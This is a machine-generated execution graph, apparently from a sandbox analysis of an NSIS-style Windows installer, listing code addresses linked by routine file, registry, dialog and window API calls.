                                                                                                                                                execution_graph 3855 401941 3856 401943 3855->3856 3861 402c41 3856->3861 3862 402c4d 3861->3862 3906 4062dc 3862->3906 3865 401948 3867 4059cc 3865->3867 3948 405c97 3867->3948 3870 4059f4 DeleteFileW 3872 401951 3870->3872 3871 405a0b 3873 405b36 3871->3873 3962 4062ba lstrcpynW 3871->3962 3873->3872 3991 4065fd FindFirstFileW 3873->3991 3875 405a31 3876 405a44 3875->3876 3877 405a37 lstrcatW 3875->3877 3963 405bdb lstrlenW 3876->3963 3880 405a4a 3877->3880 3881 405a5a lstrcatW 3880->3881 3883 405a65 lstrlenW FindFirstFileW 3880->3883 3881->3883 3885 405b2b 3883->3885 3904 405a87 3883->3904 3884 405b54 3994 405b8f lstrlenW CharPrevW 3884->3994 3885->3873 3888 405b0e FindNextFileW 3892 405b24 FindClose 3888->3892 3888->3904 3889 405984 5 API calls 3891 405b66 3889->3891 3893 405b80 3891->3893 3894 405b6a 3891->3894 3892->3885 3896 405322 24 API calls 3893->3896 3894->3872 3897 405322 24 API calls 3894->3897 3896->3872 3899 405b77 3897->3899 3898 4059cc 60 API calls 3898->3904 3901 406080 36 API calls 3899->3901 3900 405322 24 API calls 3900->3888 3903 405b7e 3901->3903 3903->3872 3904->3888 3904->3898 3904->3900 3967 4062ba lstrcpynW 3904->3967 3968 405984 3904->3968 3976 405322 3904->3976 3987 406080 MoveFileExW 3904->3987 3910 4062e9 3906->3910 3907 406534 3908 402c6e 3907->3908 3939 4062ba lstrcpynW 3907->3939 3908->3865 3923 40654e 3908->3923 3910->3907 3911 406502 lstrlenW 3910->3911 3913 4062dc 10 API calls 3910->3913 3916 406417 GetSystemDirectoryW 3910->3916 3917 40642a GetWindowsDirectoryW 3910->3917 3918 40654e 5 API calls 3910->3918 3919 4062dc 10 API calls 3910->3919 3920 4064a5 lstrcatW 3910->3920 3921 40645e SHGetSpecialFolderLocation 3910->3921 3932 406188 3910->3932 3937 406201 wsprintfW 3910->3937 3938 4062ba lstrcpynW 3910->3938 3911->3910 3913->3911 3916->3910 3917->3910 3918->3910 3919->3910 3920->3910 3921->3910 3922 406476 SHGetPathFromIDListW CoTaskMemFree 3921->3922 3922->3910 3924 40655b 3923->3924 3926 4065d1 3924->3926 3927 4065c4 CharNextW 3924->3927 3930 4065b0 CharNextW 3924->3930 3931 4065bf CharNextW 3924->3931 3944 405bbc 3924->3944 3925 4065d6 CharPrevW 3925->3926 3926->3925 3928 4065f7 3926->3928 3927->3924 3927->3926 3928->3865 3930->3924 3931->3927 3940 406127 3932->3940 3935 4061bc RegQueryValueExW RegCloseKey 3936 4061ec 3935->3936 3936->3910 3937->3910 3938->3910 3939->3908 3941 406136 3940->3941 3942 40613a 3941->3942 3943 40613f RegOpenKeyExW 3941->3943 3942->3935 3942->3936 3943->3942 3945 405bc2 3944->3945 3946 405bd8 3945->3946 3947 405bc9 CharNextW 3945->3947 3946->3924 3947->3945 3997 4062ba lstrcpynW 3948->3997 3950 405ca8 3998 405c3a CharNextW CharNextW 3950->3998 3953 4059ec 3953->3870 3953->3871 3954 40654e 5 API calls 3960 405cbe 3954->3960 3955 405cef lstrlenW 3956 405cfa 3955->3956 3955->3960 3957 405b8f 3 API calls 3956->3957 3959 405cff GetFileAttributesW 3957->3959 3958 4065fd 2 API calls 3958->3960 3959->3953 3960->3953 3960->3955 3960->3958 3961 405bdb 2 API calls 3960->3961 3961->3955 3962->3875 3964 405be9 3963->3964 3965 405bfb 3964->3965 3966 405bef CharPrevW 3964->3966 3965->3880 3966->3964 3966->3965 3967->3904 4004 405d8b GetFileAttributesW 3968->4004 3971 4059b1 3971->3904 3972 4059a7 DeleteFileW 3974 4059ad 3972->3974 3973 40599f RemoveDirectoryW 3973->3974 3974->3971 3975 4059bd SetFileAttributesW 3974->3975 3975->3971 3977 40533d 3976->3977 3986 4053df 3976->3986 3978 405359 lstrlenW 3977->3978 3981 4062dc 17 API calls 3977->3981 3979 405382 3978->3979 3980 405367 lstrlenW 3978->3980 3983 405395 3979->3983 3984 405388 SetWindowTextW 3979->3984 3982 405379 lstrcatW 3980->3982 3980->3986 3981->3978 3982->3979 3985 40539b SendMessageW SendMessageW SendMessageW 3983->3985 3983->3986 3984->3983 3985->3986 3986->3904 3988 4060a1 3987->3988 3989 406094 3987->3989 3988->3904 4007 405f06 3989->4007 3992 406613 FindClose 3991->3992 3993 405b50 3991->3993 3992->3993 3993->3872 3993->3884 3995 405b5a 3994->3995 3996 405bab lstrcatW 3994->3996 3995->3889 3996->3995 3997->3950 3999 405c57 3998->3999 4000 405c69 3998->4000 3999->4000 4001 405c64 CharNextW 3999->4001 4002 405bbc CharNextW 4000->4002 4003 405c8d 4000->4003 4001->4003 4002->4000 4003->3953 4003->3954 4005 405990 4004->4005 4006 405d9d SetFileAttributesW 4004->4006 4005->3971 4005->3972 4005->3973 4006->4005 4008 405f36 4007->4008 4009 405f5c GetShortPathNameW 4007->4009 4034 405db0 GetFileAttributesW CreateFileW 4008->4034 4011 405f71 4009->4011 4012 40607b 4009->4012 4011->4012 4014 405f79 wsprintfA 4011->4014 4012->3988 4013 405f40 CloseHandle GetShortPathNameW 4013->4012 4015 405f54 4013->4015 4016 4062dc 17 API calls 4014->4016 4015->4009 4015->4012 4017 405fa1 4016->4017 4035 405db0 GetFileAttributesW CreateFileW 4017->4035 4019 405fae 4019->4012 4020 405fbd GetFileSize GlobalAlloc 4019->4020 4021 406074 CloseHandle 4020->4021 4022 405fdf 4020->4022 4021->4012 4036 405e33 ReadFile 4022->4036 4027 406012 4029 405d15 4 API calls 4027->4029 4028 405ffe lstrcpyA 4030 406020 4028->4030 4029->4030 4031 406057 SetFilePointer 4030->4031 4043 405e62 WriteFile 4031->4043 4034->4013 4035->4019 4037 405e51 4036->4037 4037->4021 4038 405d15 lstrlenA 4037->4038 4039 405d56 lstrlenA 4038->4039 4040 405d5e 4039->4040 4041 405d2f lstrcmpiA 4039->4041 4040->4027 4040->4028 4041->4040 4042 405d4d CharNextA 4041->4042 4042->4039 4044 405e80 GlobalFree 4043->4044 4044->4021 4045 4015c1 4046 402c41 17 API calls 4045->4046 4047 4015c8 4046->4047 4048 405c3a 4 API calls 4047->4048 4060 4015d1 4048->4060 4049 401631 4051 401663 4049->4051 4052 401636 4049->4052 4050 405bbc CharNextW 4050->4060 4054 401423 24 API calls 4051->4054 4072 401423 4052->4072 4062 40165b 4054->4062 4059 40164a SetCurrentDirectoryW 4059->4062 4060->4049 4060->4050 4061 401617 GetFileAttributesW 4060->4061 4064 40588b 4060->4064 4067 4057f1 CreateDirectoryW 4060->4067 4076 40586e CreateDirectoryW 4060->4076 4061->4060 4079 406694 GetModuleHandleA 4064->4079 4068 405842 GetLastError 4067->4068 4069 40583e 4067->4069 4068->4069 4070 405851 SetFileSecurityW 4068->4070 4069->4060 4070->4069 4071 405867 GetLastError 4070->4071 4071->4069 4073 405322 24 API calls 4072->4073 4074 401431 4073->4074 4075 4062ba lstrcpynW 4074->4075 4075->4059 4077 405882 GetLastError 4076->4077 4078 40587e 4076->4078 4077->4078 4078->4060 4080 4066b0 4079->4080 4081 4066ba GetProcAddress 4079->4081 4085 406624 GetSystemDirectoryW 4080->4085 4084 405892 4081->4084 4083 4066b6 4083->4081 4083->4084 4084->4060 4087 406646 wsprintfW LoadLibraryExW 4085->4087 4087->4083 4161 401e49 4162 402c1f 17 API calls 4161->4162 4163 401e4f 4162->4163 4164 402c1f 17 API calls 4163->4164 4165 401e5b 4164->4165 4166 401e72 EnableWindow 4165->4166 4167 401e67 ShowWindow 4165->4167 4168 402ac5 4166->4168 4167->4168 4169 40264a 4170 402c1f 17 API calls 4169->4170 4178 402659 4170->4178 4171 402796 4172 4026a3 ReadFile 4172->4171 4172->4178 4173 40273c 4173->4171 4173->4178 4183 405e91 SetFilePointer 4173->4183 4174 405e33 ReadFile 4174->4178 4175 4026e3 MultiByteToWideChar 4175->4178 4176 402798 4192 406201 wsprintfW 4176->4192 4178->4171 4178->4172 4178->4173 4178->4174 4178->4175 4178->4176 4180 402709 SetFilePointer MultiByteToWideChar 4178->4180 4181 4027a9 4178->4181 4180->4178 4181->4171 4182 4027ca SetFilePointer 4181->4182 4182->4171 4184 405ead 4183->4184 4187 405ec5 4183->4187 4185 405e33 ReadFile 4184->4185 4186 405eb9 4185->4186 4186->4187 4188 405ef6 SetFilePointer 4186->4188 4189 405ece SetFilePointer 4186->4189 4187->4173 4188->4187 4189->4188 4190 405ed9 4189->4190 4191 405e62 WriteFile 4190->4191 4191->4187 4192->4171 4968 4016cc 4969 402c41 17 API calls 4968->4969 4970 4016d2 GetFullPathNameW 4969->4970 4971 4016ec 4970->4971 4977 40170e 4970->4977 4974 4065fd 2 API calls 4971->4974 4971->4977 4972 401723 GetShortPathNameW 4973 402ac5 4972->4973 4975 4016fe 4974->4975 4975->4977 4978 4062ba lstrcpynW 4975->4978 4977->4972 4977->4973 4978->4977 4979 40234e 4980 402c41 17 API calls 4979->4980 4981 40235d 4980->4981 4982 402c41 17 API calls 4981->4982 4983 402366 4982->4983 4984 402c41 17 API calls 4983->4984 4985 402370 GetPrivateProfileStringW 4984->4985 4986 401b53 4987 402c41 17 API calls 4986->4987 4988 401b5a 4987->4988 4989 402c1f 17 API calls 4988->4989 4990 401b63 wsprintfW 4989->4990 4991 402ac5 4990->4991 4992 704d18d9 4994 704d18fc 4992->4994 4993 704d1943 4996 704d1272 2 API calls 4993->4996 4994->4993 4995 704d1931 GlobalFree 4994->4995 4995->4993 4997 704d1ace GlobalFree GlobalFree 4996->4997 4998 704d1058 5000 704d1074 4998->5000 4999 704d10dd 5000->4999 5001 704d1092 5000->5001 5011 704d1516 5000->5011 5003 704d1516 GlobalFree 5001->5003 5004 704d10a2 5003->5004 5005 704d10a9 GlobalSize 5004->5005 5006 704d10b2 5004->5006 5005->5006 5007 704d10c7 5006->5007 5008 704d10b6 GlobalAlloc 5006->5008 5010 704d10d2 GlobalFree 5007->5010 5009 704d153d 3 API calls 5008->5009 5009->5007 5010->4999 5013 704d151c 5011->5013 5012 704d1522 5012->5001 5013->5012 5014 704d152e GlobalFree 5013->5014 5014->5001 5015 401956 5016 402c41 17 API calls 5015->5016 5017 40195d lstrlenW 5016->5017 5018 402592 5017->5018 5019 4014d7 5020 402c1f 17 API calls 5019->5020 5021 4014dd Sleep 5020->5021 5023 402ac5 5021->5023 4781 403d58 4782 403d70 4781->4782 4783 403eab 4781->4783 4782->4783 4784 403d7c 4782->4784 4785 403efc 4783->4785 4786 403ebc GetDlgItem GetDlgItem 4783->4786 4789 403d87 SetWindowPos 4784->4789 4790 403d9a 4784->4790 4788 403f56 4785->4788 4798 401389 2 API calls 4785->4798 4787 404231 18 API calls 4786->4787 4793 403ee6 SetClassLongW 4787->4793 4794 40427d SendMessageW 4788->4794 4844 403ea6 4788->4844 4789->4790 4791 403db7 4790->4791 4792 403d9f ShowWindow 4790->4792 4795 403dd9 4791->4795 4796 403dbf DestroyWindow 4791->4796 4792->4791 4797 40140b 2 API calls 4793->4797 4842 403f68 4794->4842 4800 403dde SetWindowLongW 4795->4800 4801 403def 4795->4801 4799 4041db 4796->4799 4797->4785 4802 403f2e 4798->4802 4808 4041eb ShowWindow 4799->4808 4799->4844 4800->4844 4804 403e98 4801->4804 4805 403dfb GetDlgItem 4801->4805 4802->4788 4806 403f32 SendMessageW 4802->4806 4803 4041bc DestroyWindow EndDialog 4803->4799 4862 404298 4804->4862 4809 403e2b 4805->4809 4810 403e0e SendMessageW IsWindowEnabled 4805->4810 4806->4844 4807 40140b 2 API calls 4807->4842 4808->4844 4813 403e38 4809->4813 4816 403e7f SendMessageW 4809->4816 4817 403e4b 4809->4817 4823 403e30 4809->4823 4810->4809 4810->4844 4812 4062dc 17 API calls 4812->4842 4813->4816 4813->4823 4815 404231 18 API calls 4815->4842 4816->4804 4819 403e53 4817->4819 4820 403e68 4817->4820 4818 403e66 4818->4804 4821 40140b 2 API calls 4819->4821 4822 40140b 2 API calls 4820->4822 4821->4823 4824 403e6f 4822->4824 4859 40420a 4823->4859 4824->4804 4824->4823 4826 403fe3 GetDlgItem 4827 404000 ShowWindow KiUserCallbackDispatcher 4826->4827 4828 403ff8 4826->4828 4856 404253 EnableWindow 4827->4856 4828->4827 4830 40402a EnableWindow 4835 40403e 4830->4835 4831 404043 GetSystemMenu EnableMenuItem SendMessageW 4832 404073 SendMessageW 4831->4832 4831->4835 4832->4835 4834 403d39 18 API calls 4834->4835 4835->4831 4835->4834 4857 404266 SendMessageW 4835->4857 4858 4062ba lstrcpynW 4835->4858 4837 4040a2 lstrlenW 4838 4062dc 17 API calls 4837->4838 4839 4040b8 SetWindowTextW 4838->4839 4840 401389 2 API calls 4839->4840 4840->4842 4841 4040fc DestroyWindow 4841->4799 4843 404116 CreateDialogParamW 4841->4843 4842->4803 4842->4807 4842->4812 4842->4815 4842->4841 4842->4844 4853 404231 4842->4853 4843->4799 4845 404149 4843->4845 4846 404231 18 API calls 4845->4846 4847 404154 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4846->4847 4848 401389 2 API calls 4847->4848 4849 40419a 4848->4849 4849->4844 4850 4041a2 ShowWindow 4849->4850 4851 40427d SendMessageW 4850->4851 4852 4041ba 4851->4852 4852->4799 4854 4062dc 17 API calls 4853->4854 4855 40423c SetDlgItemTextW 4854->4855 4855->4826 4856->4830 4857->4835 4858->4837 4860 404211 4859->4860 4861 404217 SendMessageW 4859->4861 4860->4861 4861->4818 4863 4042b0 GetWindowLongW 4862->4863 4864 40435b 4862->4864 4863->4864 4865 4042c5 4863->4865 4864->4844 4865->4864 4866 4042f2 GetSysColor 4865->4866 4867 4042f5 4865->4867 4866->4867 4868 404305 SetBkMode 4867->4868 4869 4042fb SetTextColor 4867->4869 4870 404323 4868->4870 4871 40431d GetSysColor 4868->4871 4869->4868 4872 404334 4870->4872 4873 40432a SetBkColor 4870->4873 4871->4870 4872->4864 4874 404347 DeleteObject 4872->4874 4875 40434e CreateBrushIndirect 4872->4875 4873->4872 4874->4875 4875->4864 5024 401f58 5025 402c41 17 API calls 5024->5025 5026 401f5f 5025->5026 5027 4065fd 2 API calls 5026->5027 5028 401f65 5027->5028 5029 401f76 5028->5029 5031 406201 wsprintfW 5028->5031 5031->5029 5032 402259 5033 402c41 17 API calls 5032->5033 5034 40225f 5033->5034 5035 402c41 17 API calls 5034->5035 5036 402268 5035->5036 5037 402c41 17 API calls 5036->5037 5038 402271 5037->5038 5039 4065fd 2 API calls 5038->5039 5040 40227a 5039->5040 5041 40228b lstrlenW lstrlenW 5040->5041 5042 40227e 5040->5042 5044 405322 24 API calls 5041->5044 5043 405322 24 API calls 5042->5043 5045 402286 5043->5045 5046 4022c9 SHFileOperationW 5044->5046 5046->5042 5046->5045 5047 704d16d4 5048 704d1703 5047->5048 5049 704d1b5f 22 API calls 5048->5049 5050 704d170a 5049->5050 5051 704d171d 5050->5051 5052 704d1711 5050->5052 5054 704d1744 5051->5054 5055 704d1727 5051->5055 5053 704d1272 2 API calls 5052->5053 5060 704d171b 5053->5060 5057 704d176e 5054->5057 5058 704d174a 5054->5058 5056 704d153d 3 API calls 5055->5056 5062 704d172c 5056->5062 5061 704d153d 3 API calls 5057->5061 5059 704d15b4 3 API calls 5058->5059 5063 704d174f 5059->5063 5061->5060 5064 704d15b4 3 API calls 5062->5064 5065 704d1272 2 API calls 5063->5065 5066 704d1732 5064->5066 5067 704d1755 GlobalFree 5065->5067 5068 704d1272 2 API calls 5066->5068 5067->5060 5069 704d1769 GlobalFree 5067->5069 5070 704d1738 GlobalFree 5068->5070 5069->5060 5070->5060 5071 704d2c57 5072 704d2c6f 5071->5072 5073 704d158f 2 API calls 5072->5073 5074 704d2c8a 5073->5074 5075 4046db 5076 404711 5075->5076 5077 4046eb 5075->5077 5079 404298 8 API calls 5076->5079 5078 404231 18 API calls 5077->5078 5080 4046f8 SetDlgItemTextW 5078->5080 5081 40471d 5079->5081 5080->5076 4887 40175c 4888 402c41 17 API calls 4887->4888 4889 401763 4888->4889 4890 405ddf 2 API calls 4889->4890 4891 40176a 4890->4891 4892 405ddf 2 API calls 4891->4892 4892->4891 5082 4022dd 5083 4022f7 5082->5083 5084 4022e4 5082->5084 5085 4062dc 17 API calls 5084->5085 5086 4022f1 5085->5086 5087 405920 MessageBoxIndirectW 5086->5087 5087->5083 5088 401d5d GetDlgItem GetClientRect 5089 402c41 17 API calls 5088->5089 5090 401d8f LoadImageW SendMessageW 5089->5090 5091 402ac5 5090->5091 5092 401dad DeleteObject 5090->5092 5092->5091 5093 704d166d 5094 704d1516 GlobalFree 5093->5094 5096 704d1685 5094->5096 5095 704d16cb GlobalFree 5096->5095 5097 704d16a0 5096->5097 5098 704d16b7 VirtualFree 5096->5098 5097->5095 5098->5095 5099 405461 5100 405482 GetDlgItem GetDlgItem GetDlgItem 5099->5100 5101 40560b 5099->5101 5144 404266 SendMessageW 5100->5144 5103 405614 GetDlgItem CreateThread CloseHandle 5101->5103 5104 40563c 5101->5104 5103->5104 5106 405667 5104->5106 5107 405653 ShowWindow ShowWindow 5104->5107 5108 40568c 5104->5108 5105 4054f2 5110 4054f9 GetClientRect GetSystemMetrics SendMessageW SendMessageW 5105->5110 5109 4056c7 5106->5109 5112 4056a1 ShowWindow 5106->5112 5113 40567b 5106->5113 5146 404266 SendMessageW 5107->5146 5114 404298 8 API calls 5108->5114 5109->5108 5119 4056d5 SendMessageW 5109->5119 5117 405567 5110->5117 5118 40554b SendMessageW SendMessageW 5110->5118 5115 4056c1 5112->5115 5116 4056b3 5112->5116 5120 40420a SendMessageW 5113->5120 5125 40569a 5114->5125 5122 40420a SendMessageW 5115->5122 5121 405322 24 API calls 5116->5121 5123 40557a 5117->5123 5124 40556c SendMessageW 5117->5124 5118->5117 5119->5125 5126 4056ee CreatePopupMenu 5119->5126 5120->5108 5121->5115 5122->5109 5128 404231 18 API calls 5123->5128 5124->5123 5127 4062dc 17 API calls 5126->5127 5129 4056fe AppendMenuW 5127->5129 5130 40558a 5128->5130 5131 40571b GetWindowRect 5129->5131 5132 40572e TrackPopupMenu 5129->5132 5133 405593 ShowWindow 5130->5133 5134 4055c7 GetDlgItem SendMessageW 5130->5134 5131->5132 5132->5125 5136 405749 5132->5136 5137 4055b6 5133->5137 5138 4055a9 ShowWindow 5133->5138 5134->5125 5135 4055ee SendMessageW SendMessageW 5134->5135 5135->5125 5139 405765 SendMessageW 5136->5139 5145 404266 SendMessageW 5137->5145 5138->5137 5139->5139 5140 405782 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5139->5140 5142 4057a7 SendMessageW 5140->5142 5142->5142 5143 4057d0 GlobalUnlock SetClipboardData CloseClipboard 5142->5143 5143->5125 5144->5105 5145->5134 5146->5106 5147 401563 5148 402a6b 5147->5148 5151 406201 wsprintfW 5148->5151 5150 402a70 5151->5150 4092 4023e4 4093 402c41 17 API calls 4092->4093 4094 4023f6 4093->4094 4095 402c41 17 API calls 4094->4095 4096 402400 4095->4096 4109 402cd1 4096->4109 4099 40288b 4100 402438 4102 402444 4100->4102 4133 402c1f 4100->4133 4101 402c41 17 API calls 4103 40242e lstrlenW 4101->4103 4105 402463 RegSetValueExW 4102->4105 4113 403116 4102->4113 4103->4100 4107 402479 RegCloseKey 4105->4107 4107->4099 4110 402cec 4109->4110 4136 406155 4110->4136 4114 40312f 4113->4114 4115 40315d 4114->4115 4143 403347 SetFilePointer 4114->4143 4140 403331 4115->4140 4119 4032ca 4121 40330c 4119->4121 4126 4032ce 4119->4126 4120 40317a GetTickCount 4122 4032b4 4120->4122 4129 4031c9 4120->4129 4123 403331 ReadFile 4121->4123 4122->4105 4123->4122 4124 403331 ReadFile 4124->4129 4125 403331 ReadFile 4125->4126 4126->4122 4126->4125 4127 405e62 WriteFile 4126->4127 4127->4126 4128 40321f GetTickCount 4128->4129 4129->4122 4129->4124 4129->4128 4130 403244 MulDiv wsprintfW 4129->4130 4132 405e62 WriteFile 4129->4132 4131 405322 24 API calls 4130->4131 4131->4129 4132->4129 4134 4062dc 17 API calls 4133->4134 4135 402c34 4134->4135 4135->4102 4137 406164 4136->4137 4138 40616f RegCreateKeyExW 4137->4138 4139 402410 4137->4139 4138->4139 4139->4099 4139->4100 4139->4101 4141 405e33 ReadFile 4140->4141 4142 403168 4141->4142 4142->4119 4142->4120 4142->4122 4143->4115 5152 404367 lstrcpynW lstrlenW 5153 402868 5154 402c41 17 API calls 5153->5154 5155 40286f FindFirstFileW 5154->5155 5156 402897 5155->5156 5159 402882 5155->5159 5161 406201 wsprintfW 5156->5161 5158 4028a0 5162 4062ba lstrcpynW 5158->5162 5161->5158 5162->5159 5163 401968 5164 402c1f 17 API calls 5163->5164 5165 40196f 5164->5165 5166 402c1f 17 API calls 5165->5166 5167 40197c 5166->5167 5168 402c41 17 API calls 5167->5168 5169 401993 lstrlenW 5168->5169 5171 4019a4 5169->5171 5170 4019e5 5171->5170 5175 4062ba lstrcpynW 5171->5175 5173 4019d5 5173->5170 5174 4019da lstrlenW 5173->5174 5174->5170 5175->5173 5176 403968 5177 403973 5176->5177 5178 403977 5177->5178 5179 40397a GlobalAlloc 5177->5179 5179->5178 5180 40166a 5181 402c41 17 API calls 5180->5181 5182 401670 5181->5182 5183 4065fd 2 API calls 5182->5183 5184 401676 5183->5184 5185 704d10e1 5187 704d1111 5185->5187 5186 704d11d8 GlobalFree 5187->5186 5188 704d12ba 2 API calls 5187->5188 5189 704d11d3 5187->5189 5190 704d1272 2 API calls 5187->5190 5191 704d1164 GlobalAlloc 5187->5191 5192 704d11f8 GlobalFree 5187->5192 5193 704d11c4 GlobalFree 5187->5193 5194 704d12e1 lstrcpyW 5187->5194 5188->5187 5189->5186 5190->5193 5191->5187 5192->5187 5193->5187 5194->5187 4222 4027ef 4223 402a70 4222->4223 4224 4027f6 4222->4224 4225 402c1f 17 API calls 4224->4225 4226 4027fd 4225->4226 4227 40280c SetFilePointer 4226->4227 4227->4223 4228 40281c 4227->4228 4230 406201 wsprintfW 4228->4230 4230->4223 4231 40176f 4232 402c41 17 API calls 4231->4232 4233 401776 4232->4233 4234 401796 4233->4234 4235 40179e 4233->4235 4270 4062ba lstrcpynW 4234->4270 4271 4062ba lstrcpynW 4235->4271 4238 40179c 4242 40654e 5 API calls 4238->4242 4239 4017a9 4240 405b8f 3 API calls 4239->4240 4241 4017af lstrcatW 4240->4241 4241->4238 4254 4017bb 4242->4254 4243 4065fd 2 API calls 4243->4254 4244 405d8b 2 API calls 4244->4254 4246 4017cd CompareFileTime 4246->4254 4247 40188d 4248 405322 24 API calls 4247->4248 4249 401897 4248->4249 4252 403116 31 API calls 4249->4252 4250 405322 24 API calls 4253 401879 4250->4253 4251 4062ba lstrcpynW 4251->4254 4255 4018aa 4252->4255 4254->4243 4254->4244 4254->4246 4254->4247 4254->4251 4257 4062dc 17 API calls 4254->4257 4267 401864 4254->4267 4269 405db0 GetFileAttributesW CreateFileW 4254->4269 4272 405920 4254->4272 4256 4018be SetFileTime 4255->4256 4258 4018d0 FindCloseChangeNotification 4255->4258 4256->4258 4257->4254 4258->4253 4259 4018e1 4258->4259 4260 4018e6 4259->4260 4261 4018f9 4259->4261 4262 4062dc 17 API calls 4260->4262 4263 4062dc 17 API calls 4261->4263 4265 4018ee lstrcatW 4262->4265 4266 401901 4263->4266 4265->4266 4268 405920 MessageBoxIndirectW 4266->4268 4267->4250 4267->4253 4268->4253 4269->4254 4270->4238 4271->4239 4273 405935 4272->4273 4274 405949 MessageBoxIndirectW 4273->4274 4275 405981 4273->4275 4274->4275 4275->4254 5195 704d22fd 5196 704d2367 5195->5196 5197 704d2372 GlobalAlloc 5196->5197 5198 704d2391 5196->5198 5197->5196 5199 4043f0 5200 404408 5199->5200 5204 404522 5199->5204 5205 404231 18 API calls 5200->5205 5201 40458c 5202 404656 5201->5202 5203 404596 GetDlgItem 5201->5203 5210 404298 8 API calls 5202->5210 5206 4045b0 5203->5206 5207 404617 5203->5207 5204->5201 5204->5202 5208 40455d GetDlgItem SendMessageW 5204->5208 5209 40446f 5205->5209 5206->5207 5215 4045d6 SendMessageW LoadCursorW SetCursor 5206->5215 5207->5202 5211 404629 5207->5211 5232 404253 EnableWindow 5208->5232 5213 404231 18 API calls 5209->5213 5214 404651 5210->5214 5216 40463f 5211->5216 5217 40462f SendMessageW 5211->5217 5219 40447c CheckDlgButton 5213->5219 5236 40469f 5215->5236 5216->5214 5221 404645 SendMessageW 5216->5221 5217->5216 5218 404587 5233 40467b 5218->5233 5230 404253 EnableWindow 5219->5230 5221->5214 5225 40449a GetDlgItem 5231 404266 SendMessageW 5225->5231 5227 4044b0 SendMessageW 5228 4044d6 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5227->5228 5229 4044cd GetSysColor 5227->5229 5228->5214 5229->5228 5230->5225 5231->5227 5232->5218 5234 404689 5233->5234 5235 40468e SendMessageW 5233->5235 5234->5235 5235->5201 5239 4058e6 ShellExecuteExW 5236->5239 5238 404605 LoadCursorW SetCursor 5238->5207 5239->5238 5240 401a72 5241 402c1f 17 API calls 5240->5241 5242 401a7b 5241->5242 5243 402c1f 17 API calls 5242->5243 5244 401a20 5243->5244 5245 401cf3 5246 402c1f 17 API calls 5245->5246 5247 401cf9 IsWindow 5246->5247 5248 401a20 5247->5248 5249 401573 5250 401583 ShowWindow 5249->5250 5251 40158c 5249->5251 5250->5251 5252 402ac5 5251->5252 5253 40159a ShowWindow 5251->5253 5253->5252 5254 402df3 5255 402e05 SetTimer 5254->5255 5256 402e1e 5254->5256 5255->5256 5257 402e73 5256->5257 5258 402e38 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5256->5258 5258->5257 5259 4014f5 SetForegroundWindow 5260 402ac5 5259->5260 5261 402576 5262 402c41 17 API calls 5261->5262 5263 40257d 5262->5263 5266 405db0 GetFileAttributesW CreateFileW 5263->5266 5265 402589 5266->5265 4758 401b77 4759 401b84 4758->4759 4760 401bc8 4758->4760 4763 401c0d 4759->4763 4768 401b9b 4759->4768 4761 401bf2 GlobalAlloc 4760->4761 4762 401bcd 4760->4762 4765 4062dc 17 API calls 4761->4765 4776 4022f7 4762->4776 4779 4062ba lstrcpynW 4762->4779 4764 4062dc 17 API calls 4763->4764 4763->4776 4767 4022f1 4764->4767 4765->4763 4772 405920 MessageBoxIndirectW 4767->4772 4777 4062ba lstrcpynW 4768->4777 4769 401bdf GlobalFree 4769->4776 4771 401baa 4778 4062ba lstrcpynW 4771->4778 4772->4776 4774 401bb9 4780 4062ba lstrcpynW 4774->4780 4777->4771 4778->4774 4779->4769 4780->4776 4876 4024f8 4877 402c81 17 API calls 4876->4877 4878 402502 4877->4878 4879 402c1f 17 API calls 4878->4879 4880 40250b 4879->4880 4881 402533 RegEnumValueW 4880->4881 4882 402527 RegEnumKeyW 4880->4882 4885 40288b 4880->4885 4883 40254f RegCloseKey 4881->4883 4884 402548 4881->4884 4882->4883 4883->4885 4884->4883 5267 404a78 5268 404aa4 5267->5268 5269 404a88 5267->5269 5271 404ad7 5268->5271 5272 404aaa SHGetPathFromIDListW 5268->5272 5278 405904 GetDlgItemTextW 5269->5278 5274 404ac1 SendMessageW 5272->5274 5275 404aba 5272->5275 5273 404a95 SendMessageW 5273->5268 5274->5271 5277 40140b 2 API calls 5275->5277 5277->5274 5278->5273 5279 40167b 5280 402c41 17 API calls 5279->5280 5281 401682 5280->5281 5282 402c41 17 API calls 5281->5282 5283 40168b 5282->5283 5284 402c41 17 API calls 5283->5284 5285 401694 MoveFileW 5284->5285 5286 4016a7 5285->5286 5292 4016a0 5285->5292 5288 4065fd 2 API calls 5286->5288 5290 402250 5286->5290 5287 401423 24 API calls 5287->5290 5289 4016b6 5288->5289 5289->5290 5291 406080 36 API calls 5289->5291 5291->5292 5292->5287 5293 401e7d 5294 402c41 17 API calls 5293->5294 5295 401e83 5294->5295 5296 402c41 17 API calls 5295->5296 5297 401e8c 5296->5297 5298 402c41 17 API calls 5297->5298 5299 401e95 5298->5299 5300 402c41 17 API calls 5299->5300 5301 401e9e 5300->5301 5302 401423 24 API calls 5301->5302 5303 401ea5 5302->5303 5310 4058e6 ShellExecuteExW 5303->5310 5305 401ee7 5307 40288b 5305->5307 5311 406745 WaitForSingleObject 5305->5311 5308 401f01 CloseHandle 5308->5307 5310->5305 5312 40675f 5311->5312 5313 406771 GetExitCodeProcess 5312->5313 5314 4066d0 2 API calls 5312->5314 5313->5308 5315 406766 WaitForSingleObject 5314->5315 5315->5312 5316 4019ff 5317 402c41 17 API calls 5316->5317 5318 401a06 5317->5318 5319 402c41 17 API calls 5318->5319 5320 401a0f 5319->5320 5321 401a16 lstrcmpiW 5320->5321 5322 401a28 lstrcmpW 5320->5322 5323 401a1c 5321->5323 5322->5323 5324 401000 5325 401037 BeginPaint GetClientRect 5324->5325 5326 40100c DefWindowProcW 5324->5326 5328 4010f3 5325->5328 5329 401179 5326->5329 5330 401073 CreateBrushIndirect FillRect DeleteObject 5328->5330 5331 4010fc 5328->5331 5330->5328 5332 401102 CreateFontIndirectW 5331->5332 5333 401167 EndPaint 5331->5333 5332->5333 5334 401112 6 API calls 5332->5334 5333->5329 5334->5333 5335 401503 5336 40150b 5335->5336 5338 40151e 5335->5338 5337 402c1f 17 API calls 5336->5337 5337->5338 4144 402484 4155 402c81 4144->4155 4147 402c41 17 API calls 4148 402497 4147->4148 4149 4024a2 RegQueryValueExW 4148->4149 4152 40288b 4148->4152 4150 4024c8 RegCloseKey 4149->4150 4151 4024c2 4149->4151 4150->4152 4151->4150 4160 406201 wsprintfW 4151->4160 4156 402c41 17 API calls 4155->4156 4157 402c98 4156->4157 4158 406127 RegOpenKeyExW 4157->4158 